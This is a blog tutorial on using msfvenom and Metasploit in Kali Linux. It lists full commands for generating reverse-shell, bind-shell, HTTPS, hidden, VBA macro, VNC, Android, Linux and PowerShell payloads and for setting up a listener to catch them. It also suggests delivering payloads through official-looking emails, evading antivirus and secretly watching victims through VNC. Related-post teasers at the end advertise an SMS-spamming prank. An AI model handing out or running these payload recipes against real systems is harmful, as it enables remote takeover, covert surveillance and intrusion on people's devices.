How to use Msfvenom Commands in Kali Linux Amit, 10, April 202310, April 2023 In this article you will learn about the numerous possibilities of Msfvenom. Use this tool to construct shellcode with various extensions and tactics.TABLE OF CONTENTS1 Msfvenom2 Shellcode3 Using Msfvenom4 How to generate a payload with Msfvenom4.1 Reverse Shell4.1.1 How to Setup for Listeners4.2 Msfvenom Bind shell4.3 Reverse TCP Payload4.4 Msfvenom HTTPS Payload4.5 Hidden Bind TCP Payload4.6 Reverse Shell Payload with Netcat4.7 Macro Payload4.8 VNC Payload4.9 Msfvenom Android Payload4.10 Linux Payload4.11 PowerShell Payload5 Access Android with Msfvenom (Cybersecurity) 🔥5.1 About The Author5.1.1 Amit5.2 RelatedMsfvenomMsfvenom is a command line tool for Metasploit to generate shellcode. It is also called Payload Generating and Encoding System. Because on June 8, 2015, it replaced the role of msfpayload and msfencode.ShellcodeShellcode is malicious computer code that sends the creator back to a remote shell. Nowadays, many large organizations are the target of malicious shellcode.A hacker John intercepts a file and sends it to a company employee who executes it. The hacker gains remote control of a device when it is installed or executed.Shellcode can also be inserted into legitimate software to create a backdoor.Using MsfvenomFirstly, use the msfvenom program to generate the shell code file. Secondly copy the payload to a Windows 7 machine and run it. However, sometimes the Windows firewall blocks this kind of payload. In addition, msfvenom also encoding payload that bypass antivirus without any doubt. Thirdly, and most importantly, the Kali Linux system must be configured to scan for incoming connections.Requirements:Kali Linux with MetasploitWindows 7 Machine on same networkAndroid PhoneEnter the msfvenom command in the Kali Linux terminal. It provides all the options for creating a payload.msfvenomBefore using msfvenom, please read the options included in it first:How to generate a payload with MsfvenomYou must select a platform, a payload, and sometimes an encoder before you can create a shell file. In addition, Msfvenom offers unique capabilities that allow it to bypass antivirus software.You need to look at the 500+ payloads that are currently available.msfvenom -l payloadsAbove all, look briefly at the possible combinations. Some of them involve certain operations, like creating a user. Others are more serious, like “windows/format_all_drives” (also known as ShellcodeOfDeath). This payload formats all mounted drives on the remote target.Reverse ShellIn contrast, a reverse shell, often referred to as a connect-back, requires the attacker to first set up a listener on his system. The target computer acts as a client that connects to this listener. Then the attacker finally receives the shell.Let us use our Windows 7 PC as a target and create a simple reverse shell.In the Kali terminal, enter the msfvenom combinator command as shown below:msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > payload.exe-p for payload, LHOST for Kali Linux IP, type ipconfig in another terminal to get your local IP.LPORT for local port (set port 4444 as default), -f for output format and payload.exe is the name of the shellcode, you can rename it.How to Setup for Listeners transfer the file “payload.exe” to the target computer running Windows 7. For our purposes, you can simply drag and drop the file between the Kali system and the Windows 7 VM.However, in real life, an attacker would probably try to get the victim to execute the shellcode. For example, by attaching the shellcode file to an official-looking email.Start Metasploit Framework on Kali Linux by typing msfconsole in the terminal. Then set up a handler to wait for incoming connections:use exploit/multi/handler Use same payload for listener.set payload windows/shell/reverse_tcp You need to set default LPORT.set LPORT 4444 In the LHOST, you can use your local IP address.set LHOST 192.168.1.10Finally this exploit is ready to start listening with exploit command.exploitNow run the “payload.exe” file on the target Windows system, and the attacker’s terminal will display the following:Just type exit to leave the shell and return to Metasploit. To repeat this for again listening.Msfvenom Bind shellA bind shell is a shell that starts a new service on the target computer. Consequently, the attacker must connect to establish a session.msfvenom -p windows/meterpreter/bind_tcp -f exe > bind.exeReverse TCP PayloadA reverse shell is referred to as a connect-back. To do this, the attacker must first set up a listener on his system. The target computer acts as a client that connects to this listener, for example.msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=5555 -f exe > reverse_tcp.exeMsfvenom HTTPS PayloadThe question arises: what if the victim has blocked all ports? So, The previous two payloads can be used if the victim system has the required ports open.In conclusion, we can generate payloads that correspond to the open ports on the victim machine, e.g. 443 for https:msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=443 -f exe > /root/Desktop/443.exeHidden Bind TCP PayloadLet us see another method offered by the msfvenom tool and try to exploit the target computer. Moreover, this time we get the shell of the victim computer and not a meterpreter session.However, this payload runs invisibly in the background while active and is not detected by any port scanner.msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.0.10 LPORT=1010 -f exe > hidden.exeReverse Shell Payload with NetcatLet us consequently the procedure with shell_reverse_tcp payload. Another method to get the victim’s shell session.msfvenom -p windows/shell_reverse_tcp AHOST=192.168.0.107 LPORT=4444 -f exe > ncshell.exeMacro PayloadTo exploit the PC target, we now generate a payload using a VBA script. This payload is used to create an Excel macro.msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=7777 -f vbaVNC PayloadWhy do not we take advantage of the fact that this payload allows us to steal the victim’s computer without him knowing about it and observe his behavior in secret.msfvenom -p windows/vncinject/reverse_tcp LHOST=192.168.0.107 LPORT=5900 -f exe > /root/Desktop/vnc.exeMsfvenom Android PayloadLet us use one of the Android exploits available in the msfvenom tool and use it to our advantage. Mobile exploitation has always been a hot topic and it still is today.msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 > file.apkLinux PayloadFor the Linux payload, open Kali Terminal and type the following command:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f elf > shellPowerShell PayloadIn the Kali terminal, enter the following command to create a payload for Windows PowerShell:msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.10 LPORT=4444 > shell.batLast but not least – Metasploit Payloads (Detailed Spreadsheet)Access Android with Msfvenom (Cybersecurity) 🔥 Article References Metasploit DocumentationHacking ArticlesIntermediate Security Testing With Kali Linux Book available on amazonLoiLiangYang YouTube ChannelAbout The Author Amit See author's posts Related Exploits kali Linux Metasploit encoderexploitKali LinuxmsfvenomMsfvenom command optionspayloadshellcode
kali Linux Kali Linux Default Password And How To Change Or Reset It 25, July 202325, July 2023For the default username and password, each Linux distribution has its own set of restrictions. Some will generate it for you, and most will have a short wizard on the first boot to walk you through the process. Kali Linux is not an exception, with its default user and password… Read More
Hacking Sqlmap Cheat Sheet Everything you need to know 19, June 202212, December 2022SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.TABLE OF CONTENTS0.1 What is SQLMAP ?0.2 How to Download SQLMAP?0.2.0.1 Sqlmap tutorial step by step1 Disclaimer1.0.1 About The Author1.0.1.1 Ankit ChaubeyWhat is SQLMAP ?… Read More
How To How to send Infinite SMS Messages 15, September 202315, September 2023Sometimes, hackers take pleasure in scaring or making fun of people by saying that their account has been compromised. They do this by sending people an endless stream of spam SMS messages, making it appear that their account has been compromised. These spammers either want to scare people or secretly… Read More